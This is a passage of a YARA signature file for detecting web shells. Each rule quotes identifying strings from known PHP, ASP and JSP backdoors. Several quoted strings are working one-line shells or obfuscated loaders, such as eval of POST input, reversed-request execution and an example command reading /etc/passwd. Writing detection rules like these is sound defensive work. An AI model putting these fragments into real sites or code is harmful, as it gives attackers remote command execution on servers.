= "b9744f6876919c46a29ea05b1d95b1c3" hash22 = "6acc82544be056580c3a1caaa4999956" hash23 = "6aa32a6392840e161a018f3907a86968" hash24 = "591ca89a25f06cf01e4345f98a22845c" hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c" hash26 = "3ea688e3439a1f56b16694667938316d" hash27 = "ab77e4d1006259d7cbc15884416ca88c" hash28 = "71097537a91fac6b01f46f66ee2d7749" hash29 = "2434a7a07cb47ce25b41d30bc291cacc" hash30 = "7a4b090619ecce6f7bd838fe5c58554b" strings: $s3 = "String savePath = request.getParameter(\"savepath\");" fullword $s4 = "URL downUrl = new URL(downFileUrl);" fullword $s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword $s6 = "String downFileUrl = request.getParameter(\"url\");" fullword $s7 = "FileInputStream fInput = new FileInputStream(f);" fullword $s8 = "URLConnection conn = downUrl.openConnection();" fullword $s9 = "sis = request.getInputStream();" fullword condition: 4 of them } rule webshell_2_520_icesword_job_ma1 { meta: description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "64a3bf9142b045b9062b204db39d4d57" hash1 = "9abd397c6498c41967b4dd327cf8b55a" hash2 = "077f4b1b6d705d223b6d644a4f3eebae" hash3 = "56c005690da2558690c4aa305a31ad37" hash4 = "532b93e02cddfbb548ce5938fe2f5559" strings: $s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword $s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword $s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword condition: 2 of them } rule webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn { meta: description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "7066f4469c3ec20f4890535b5f299122" hash1 = "9f54aa7b43797be9bab7d094f238b4ff" hash2 = "793b3d0a740dbf355df3e6f68b8217a4" hash3 = "8979594423b68489024447474d113894" hash4 = "ec482fc969d182e5440521c913bab9bd" hash5 = "f98d2b33cd777e160d1489afed96de39" hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7" hash7 = "e9a5280f77537e23da2545306f6a19ad" strings: $s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol" $s2 = " KB </td>" fullword $s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"" $s4 = "<!-- <tr align=\"center\"> " fullword condition: all of them } rule webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY { meta: description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "b68bfafc6059fd26732fa07fb6f7f640" hash1 = "42f211cec8032eb0881e87ebdb3d7224" hash2 = "40a1f840111996ff7200d18968e42cfe" hash3 = "0712e3dc262b4e1f98ed25760b206836" strings: $s4 = "http://www.4ngel.net" fullword $s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword $s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword $s9 = "Codz by Angel" fullword condition: 2 of them } rule webshell_c99_locus7s_c99_w4cking_xxx { meta: description = "Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "38fd7e45f9c11a37463c3ded1c76af4c" hash1 = "9c34adbc8fd8d908cbb341734830f971" hash2 = "ef43fef943e9df90ddb6257950b3538f" hash3 = "ae025c886fbe7f9ed159f49593674832" hash4 = "911195a9b7c010f61b66439d9048f400" hash5 = "697dae78c040150daff7db751fc0c03c" hash6 = "513b7be8bd0595c377283a7c87b44b2e" hash7 = "1d912c55b96e2efe8ca873d6040e3b30" hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a" hash9 = "4108f28a9792b50d95f95b9e5314fa1e" hash10 = "b8f261a3cdf23398d573aaf55eaf63b5" hash11 = "0d2c2c151ed839e6bafc7aa9c69be715" hash12 = "41af6fd253648885c7ad2ed524e0692d" hash13 = "6fcc283470465eed4870bcc3e2d7f14d" strings: $s1 = "$res = @shell_exec($cfe);" fullword $s8 = "$res = @ob_get_contents();" fullword $s9 = "@exec($cfe,$res);" fullword condition: 2 of them } rule webshell_browser_201_3_ma_ma2_download { meta: description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "37603e44ee6dc1c359feb68a0d566f76" hash1 = "a7e25b8ac605753ed0c438db93f6c498" hash2 = "fb8c6c3a69b93e5e7193036fd31a958d" hash3 = "4cc68fa572e88b669bce606c7ace0ae9" hash4 = "4b45715fa3fa5473640e17f49ef5513d" hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a" strings: $s1 = "private static final int EDITFIELD_ROWS = 30;" fullword $s2 = "private static String tempdir = \".\";" fullword $s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\"" condition: 2 of them } rule webshell_000_403_c5_queryDong_spyjsp2010 { meta: description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "2eeb8bf151221373ee3fd89d58ed4d38" hash1 = "059058a27a7b0059e2c2f007ad4675ef" hash2 = "8b457934da3821ba58b06a113e0d53d9" hash3 = "90a5ba0c94199269ba33a58bc6a4ad99" hash4 = "655722eaa6c646437c8ae93daac46ae0" strings: $s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val" $s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa" $s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName(" $s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword condition: 2 of them } rule webshell_r57shell127_r57_kartal_r57 { meta: description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "ae025c886fbe7f9ed159f49593674832" hash1 = "1d912c55b96e2efe8ca873d6040e3b30" hash2 = "4108f28a9792b50d95f95b9e5314fa1e" strings: $s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword $s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword $s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_" condition: 2 of them } rule webshell_webshells_new_con2 { meta: description = "Web shells - generated from file con2.asp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "d3584159ab299d546bd77c9654932ae3" strings: $s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e" $s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n" condition: 1 of them } rule webshell_webshells_new_make2 { meta: description = "Web shells - generated from file make2.php" author = "Florian Roth" date = "2014/03/28" hash = "9af195491101e0816a263c106e4c145e" score = 50 strings: $s1 = "error_reporting(0);session_start();header(\"Content-type:text/html;charset=utf-8" condition: all of them } rule webshell_webshells_new_aaa { meta: description = "Web shells - generated from file aaa.asp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "68483788ab171a155db5266310c852b2" strings: $s0 = "Function fvm(jwv):If jwv=\"\"Then:fvm=jwv:Exit Function:End If:Dim tt,sru:tt=\"" $s5 = "<option value=\"\"DROP TABLE [jnc];exec mast\"&kvp&\"er..xp_regwrite 'HKEY_LOCAL" $s17 = "if qpv=\"\" then qpv=\"x:\\Program Files\\MySQL\\MySQL Server 5.0\\my.ini\"&br&" condition: 1 of them } rule webshell_Expdoor_com_ASP { meta: description = "Web shells - generated from file Expdoor.com ASP.asp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "caef01bb8906d909f24d1fa109ea18a7" strings: $s4 = "\">www.Expdoor.com</a>" fullword $s5 = " <input name=\"FileName\" type=\"text\" value=\"Asp_ver.Asp\" size=\"20\" max" $s10 = "set file=fs.OpenTextFile(server.MapPath(FileName),8,True) '" fullword $s14 = "set fs=server.CreateObject(\"Scripting.FileSystemObject\") '" fullword $s16 = "<TITLE>Expdoor.com ASP" fullword condition: 2 of them } rule webshell_webshells_new_php2 { meta: description = "Web shells - generated from file php2.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "fbf2e76e6f897f6f42b896c855069276" strings: $s0 = "<?php $s=@$_GET[2];if(md5($s.$s)==" condition: all of them } rule webshell_bypass_iisuser_p { meta: description = "Web shells - generated from file bypass-iisuser-p.asp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "924d294400a64fa888a79316fb3ccd90" strings: $s0 = "<%Eval(Request(chr(112))):Set fso=CreateObject" condition: all of them } rule webshell_sig_404super { meta: description = "Web shells - generated from file 404super.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "7ed63176226f83d36dce47ce82507b28" strings: $s4 = "$i = pack('c*', 0x70, 0x61, 99, 107);" fullword $s6 = " 'h' => $i('H*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631')," fullword $s7 = "//http://require.duapp.com/session.php" fullword $s8 = "if(!isset($_SESSION['t'])){$_SESSION['t'] = $GLOBALS['f']($GLOBALS['h']);}" fullword $s12 = "//define('pass','123456');" fullword $s13 = "$GLOBALS['c']($GLOBALS['e'](null, $GLOBALS['s']('%s',$GLOBALS['p']('H*',$_SESSIO" condition: 1 of them } rule webshell_webshells_new_JSP { meta: description = "Web shells - generated from file JSP.jsp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "495f1a0a4c82f986f4bdf51ae1898ee7" strings: $s1 = "void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i" $s5 = "bw.write(z2);bw.close();sb.append(\"1\");}else if(Z.equals(\"E\")){EE(z1);sb.app" $s11 = "if(Z.equals(\"A\")){String s=new File(application.getRealPath(request.getRequest" condition: 1 of them } rule webshell_webshell_123 { meta: description = "Web shells - generated from file webshell-123.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "2782bb170acaed3829ea9a04f0ac7218" strings: $s0 = "// Web Shell!!" fullword $s1 = "@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6C\\x28\\x67\\x7A\\x69\\x6E\\x66\\x6" $s3 = "$default_charset = \"UTF-8\";" fullword $s4 = "// url:http://www.weigongkai.com/shell/" fullword condition: 2 of them } rule webshell_dev_core { meta: description = "Web shells - generated from file dev_core.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "55ad9309b006884f660c41e53150fc2e" strings: $s1 = "if (strpos($_SERVER['HTTP_USER_AGENT'], 'EBSD') == false) {" fullword $s9 = "setcookie('key', $_POST['pwd'], time() + 3600 * 24 * 30);" fullword $s10 = "$_SESSION['code'] = _REQUEST(sprintf(\"%s?%s\",pack(\"H*\",'6874" $s11 = "if (preg_match(\"/^HTTP\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))" $s12 = "eval(gzuncompress(gzuncompress(Crypt::decrypt($_SESSION['code'], $_C" $s15 = "if (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))" condition: 1 of them } rule webshell_webshells_new_pHp { meta: description = "Web shells - generated from file pHp.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "b0e842bdf83396c3ef8c71ff94e64167" strings: $s0 = "if(is_readable($path)) antivirus($path.'/',$exs,$matches);" fullword $s1 = "'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr" $s13 = "'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*" $s14 = "'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+" $s19 = "'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_once" condition: 1 of them } rule webshell_webshells_new_pppp { meta: description = "Web shells - generated from file pppp.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "cf01cb6e09ee594545693c5d327bdd50" strings: $s0 = "Mail: chinese@hackermail.com" fullword $s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo " $s6 = "Site: http://blog.weili.me" fullword condition: 1 of them } rule webshell_webshells_new_code { meta: description = "Web shells - generated from file code.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "a444014c134ff24c0be5a05c02b81a79" strings: $s1 = "<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi" $s7 = "$file = !empty($_POST[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_PO" $s10 = "if (true==@move_uploaded_file($_FILES['userfile']['tmp_name'],self::convert_" $s14 = "Processed in <span id=\"runtime\"></span> second(s) {gzip} usage:" $s17 = "<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm" condition: 1 of them } rule webshell_webshells_new_jspyyy { meta: description = "Web shells - generated from file jspyyy.jsp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "b291bf3ccc9dac8b5c7e1739b8fa742e" strings: $s0 = "<%@page import=\"java.io.*\"%><%if(request.getParameter(\"f\")" condition: all of them } rule webshell_webshells_new_xxxx { meta: description = "Web shells - generated from file xxxx.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "5bcba70b2137375225d8eedcde2c0ebb" strings: $s0 = "<?php eval($_POST[1]);?> " fullword condition: all of them } rule webshell_webshells_new_JJjsp3 { meta: description = "Web shells - generated from file JJjsp3.jsp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "949ffee1e07a1269df7c69b9722d293e" strings: $s0 = "<%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!S" condition: all of them } rule webshell_webshells_new_PHP1 { meta: description = "Web shells - generated from file PHP1.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "14c7281fdaf2ae004ca5fec8753ce3cb" strings: $s0 = "<[url=mailto:?@array_map($_GET[]?@array_map($_GET['f'],$_GET[/url]);?>" fullword $s2 = ":https://forum.90sec.org/forum.php?mod=viewthread&tid=7316" fullword $s3 = "@preg_replace(\"/f/e\",$_GET['u'],\"fengjiao\"); " fullword condition: 1 of them } rule webshell_webshells_new_JJJsp2 { meta: description = "Web shells - generated from file JJJsp2.jsp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "5a9fec45236768069c99f0bfd566d754" strings: $s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z" $s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ" $s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()" $s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase(" condition: 1 of them } rule webshell_webshells_new_radhat { meta: description = "Web shells - generated from file radhat.asp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "72cb5ef226834ed791144abaa0acdfd4" strings: $s1 = "sod=Array(\"D\",\"7\",\"S" condition: all of them } rule webshell_webshells_new_asp1 { meta: description = "Web shells - generated from file asp1.asp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "b63e708cd58ae1ec85cf784060b69cad" strings: $s0 = " http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave " fullword $s2 = " <% a=request(chr(97)) ExecuteGlobal(StrReverse(a)) %>" fullword condition: 1 of them } rule webshell_webshells_new_php6 { meta: description = "Web shells - generated from file php6.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "ea75280224a735f1e445d244acdfeb7b" strings: $s1 = "array_map(\"asx73ert\",(ar" $s3 = "preg_replace(\"/[errorpage]/e\",$page,\"saft\");" fullword $s4 = "shell.php?qid=zxexp " fullword condition: 1 of them } rule webshell_webshells_new_xxx { meta: description = "Web shells - generated from file xxx.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "0e71428fe68b39b70adb6aeedf260ca0" strings: $s3 = "<?php array_map(\"ass\\x65rt\",(array)$_REQUEST['expdoor']);?>" fullword condition: all of them } rule webshell_GetPostpHp { meta: description = "Web shells - generated from file GetPostpHp.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "20ede5b8182d952728d594e6f2bb5c76" strings: $s0 = "<?php eval(str_rot13('riny($_CBFG[cntr]);'));?>" fullword condition: all of them } rule webshell_webshells_new_php5 { meta: description = "Web shells - generated from file php5.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "cf2ab009cbd2576a806bfefb74906fdf" strings: $s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u" condition: all of them } rule webshell_webshells_new_PHP { meta: description = "Web shells - generated from file PHP.php" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "a524e7ae8d71e37d2fd3e5fbdab405ea" strings: $s1 = "echo \"<font color=blue>Error!</font>\";" fullword $s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE" $s5 = " - ExpDoor.com</title>" fullword $s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword $s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword condition: 1 of them } rule webshell_webshells_new_Asp { meta: description = "Web shells - generated from file Asp.asp" author = "Florian Roth" date = "2014/03/28" score = 70 hash = "32c87744ea404d0ea0debd55915010b7" strings: $s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword $s2 = "Function MorfiCoder(Code)" fullword $s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword condition: 1 of them } rule WebShell_cgi { meta: description = "Semi-Auto-generated - file WebShell.cgi.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "bc486c2e00b5fc3e4e783557a2441e6f" strings: $s0 = "WebShell.cgi" $s2 = "<td><code class=\"entry-[% if entry.all_rights %]mine[% else" condition: all of them } rule WinX_Shell_html { meta: description = "Semi-Auto-generated - file WinX Shell.html.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "17ab5086aef89d4951fe9b7c7a561dda" strings: $s0 = "WinX Shell" $s1 = "Created by greenwood from n57" $s2 = "<td><font color=\\\"#990000\\\">Win Dir:</font></td>" condition: 2 of them } rule Dx_php_php { meta: description = "Semi-Auto-generated - file Dx.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "9cfe372d49fe8bf2fac8e1c534153d9b" strings: $s0 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx" $s2 = "$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Util" $s3 = "$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERVER['HTTP" condition: 1 of them } rule csh_php_php { meta: description = "Semi-Auto-generated - file csh.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "194a9d3f3eac8bc56d9a7c55c016af96" strings: $s0 = ".::[c0derz]::. web-shell" $s1 = "http://c0derz.org.ua" $s2 = "vint21h@c0derz.org.ua" $s3 = "$name='63a9f0ea7bb98050796b649e85481845';//root" condition: 1 of them } rule pHpINJ_php_php { meta: description = "Semi-Auto-generated - file pHpINJ.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "d7a4b0df45d34888d5a09f745e85733f" strings: $s1 = "News Remote PHP Shell Injection" $s3 = "Php Shell <br />" fullword $s4 = "<input type = \"text\" name = \"url\" value = \"" condition: 2 of them } rule sig_2008_php_php { meta: description = "Semi-Auto-generated - file 2008.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "3e4ba470d4c38765e4b16ed930facf2c" strings: $s0 = "Codz by angel(4ngel)" $s1 = "Web: http://www.4ngel.net" $s2 = "$admin['cookielife'] = 86400;" $s3 = "$errmsg = 'The file you want Downloadable was nonexistent';" condition: 1 of them } rule ak74shell_php_php { meta: description = "Semi-Auto-generated - file ak74shell.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "7f83adcb4c1111653d30c6427a94f66f" strings: $s1 = "$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_SESSION[" $s2 = "AK-74 Security Team Web Site: www.ak74-team.net" $s3 = "$xshell" condition: 2 of them } rule Rem_View_php_php { meta: description = "Semi-Auto-generated - file Rem View.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "29420106d9a81553ef0d1ca72b9934d9" strings: $s0 = "$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"" $s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'" $s4 ="Welcome to phpRemoteView (RemView)" condition: 1 of them } rule Java_Shell_js { meta: description = "Semi-Auto-generated - file Java Shell.js.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "36403bc776eb12e8b7cc0eb47c8aac83" strings: $s2 = "PySystemState.initialize(System.getProperties(), null, argv);" fullword $s3 = "public class JythonShell extends JPanel implements Runnable {" fullword $s4 = "public static int DEFAULT_SCROLLBACK = 100" condition: 2 of them } rule STNC_php_php { meta: description = "Semi-Auto-generated - file STNC.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "2e56cfd5b5014cbbf1c1e3f082531815" strings: $s0 = "drmist.ru" fullword $s1 = "hidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80" $s2 = "STNC WebShell" $s3 = "http://www.security-teams.net/index.php?showtopic=" condition: 1 of them } rule aZRaiLPhp_v1_0_php { meta: description = "Semi-Auto-generated - file aZRaiLPhp v1.0.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "26b2d3943395682e36da06ed493a3715" strings: $s0 = "azrailphp" $s1 = "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>" $s3 = "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>" condition: 2 of them } rule Moroccan_Spamers_Ma_EditioN_By_GhOsT_php { meta: description = "Semi-Auto-generated - file Moroccan Spamers Ma-EditioN By GhOsT.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "d1b7b311a7ffffebf51437d7cd97dc65" strings: $s0 = ";$sd98=\"john.barker446@gmail.com\"" $s1 = "print \"Sending mail to $to....... \";" $s2 = "<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei" condition: 1 of them } rule zacosmall_php { meta: description = "Semi-Auto-generated - file zacosmall.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "5295ee8dc2f5fd416be442548d68f7a6" strings: $s0 = "rand(1,99999);$sj98" $s1 = "$dump_file.='`'.$rows2[0].'`" $s3 = "filename=\\\"dump_{$db_dump}_${table_d" condition: 2 of them } rule CmdAsp_asp { meta: description = "Semi-Auto-generated - file CmdAsp.asp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "64f24f09ec6efaa904e2492dffc518b9" strings: $s0 = "CmdAsp.asp" $s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword $s2 = "-- Use a poor man's pipe ... a temp file --" $s3 = "maceo @ dogmile.com" condition: 2 of them } rule simple_backdoor_php { meta: description = "Semi-Auto-generated - file simple-backdoor.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "f091d1b9274c881f8e41b2f96e6b9936" strings: $s0 = "$cmd = ($_REQUEST['cmd']);" fullword $s1 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" $s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword condition: 2 of them } rule mysql_shell_php { meta: description = "Semi-Auto-generated - file mysql_shell.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "d42aec2891214cace99b3eb9f3e21a63" strings: $s0 = "SooMin Kim" $s1 = "smkim@popeye.snu.ac.kr" $s2 = "echo \"<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablen" condition: 1 of them } rule Dive_Shell_1_0___Emperor_Hacking_Team_php { meta: description = "Semi-Auto-generated - file Dive Shell 1.0 - Emperor Hacking Team.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "1b5102bdc41a7bc439eea8f0010310a5" strings: $s0 = "Emperor Hacking TEAM" $s1 = "Simshell" fullword $s2 = "ereg('^[[:blank:]]*cd[[:blank:]]" $s3 = "<form name=\"shell\" action=\"<?php echo $_SERVER['PHP_SELF'] ?>\" method=\"POST" condition: 2 of them } rule Asmodeus_v0_1_pl { meta: description = "Semi-Auto-generated - file Asmodeus v0.1.pl.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "0978b672db0657103c79505df69cb4bb" strings: $s0 = "[url=http://www.governmentsecurity.org" $s1 = "perl asmodeus.pl client 6666" $s2 = "print \"Asmodeus Perl Remote Shell" $s4 = "$internet_addr = inet_aton(\"$host\") or die \"ALOA:$!\\n\";" fullword condition: 2 of them } rule backup_php_often_with_c99shell { meta: description = "Semi-Auto-generated - file backup.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "aeee3bae226ad57baf4be8745c3f6094" strings: $s0 = "#phpMyAdmin MySQL-Dump" fullword $s2 = ";db_connect();header('Content-Type: application/octetstr" $s4 = "$data .= \"#Database: $database" fullword condition: all of them } rule Reader_asp { meta: description = "Semi-Auto-generated - file Reader.asp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "ad1a362e0a24c4475335e3e891a01731" strings: $s1 = "Mehdi & HolyDemon" $s2 = "www.infilak." $s3 = "'*T@*r@#@&mms^PdbYbVuBcAAA==^#~@%><form method=post name=inf><table width=\"75%" condition: 2 of them } rule phpshell17_php { meta: description = "Semi-Auto-generated - file phpshell17.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "9a928d741d12ea08a624ee9ed5a8c39d" strings: $s0 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p>" fullword $s1 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]<?php echo PHPSHELL_VERSION ?></" $s2 = "href=\"mailto: [YOU CAN ENTER YOUR MAIL HERE]- [ADDITIONAL TEXT]</a></i>" fullword condition: 1 of them } rule myshell_php_php { meta: description = "Semi-Auto-generated - file myshell.php.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "62783d1db52d05b1b6ae2403a7044490" strings: $s0 = "@chdir($work_dir) or ($shellOutput = \"MyShell: can't change directory." $s1 = "echo \"<font color=$linkColor><b>MyShell file editor</font> File:<font color" $s2 = " $fileEditInfo = \" ::::::: Owner: <font color=$" condition: 2 of them } rule SimShell_1_0___Simorgh_Security_MGZ_php { meta: description = "Semi-Auto-generated - file SimShell 1.0 - Simorgh Security MGZ.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "37cb1db26b1b0161a4bf678a6b4565bd" strings: $s0 = "Simorgh Security Magazine " $s1 = "Simshell.css" $s2 = "} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], " $s3 = "www.simorgh-ev.com" condition: 2 of them } rule jspshall_jsp { meta: description = "Semi-Auto-generated - file jspshall.jsp.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "efe0f6edaa512c4e1fdca4eeda77b7ee" strings: $s0 = "kj021320" $s1 = "case 'T':systemTools(out);break;" $s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file" condition: 2 of them } rule webshell_php { meta: description = "Semi-Auto-generated - file webshell.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "e425241b928e992bde43dd65180a4894" strings: $s2 = "<die(\"Couldn't Read directory, Blocked!!!\");" $s3 = "PHP Web Shell" condition: all of them } rule rootshell_php { meta: description = "Semi-Auto-generated - file rootshell.php.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "265f3319075536030e59ba2f9ef3eac6" strings: $s0 = "shells.dl.am" $s1 = "This server has been infected by $owner" $s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>" $s4 = "Could not write to file! (Maybe you didn't enter any text?)" condition: 2 of them } rule connectback2_pl { meta: description = "Semi-Auto-generated - file connectback2.pl.txt" author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls" hash = "473b7d226ea6ebaacc24504bd740822e" strings: $s0 = "#We Are: MasterKid, AleXutz, FatMan & MiKuTuL " $s1 = "echo 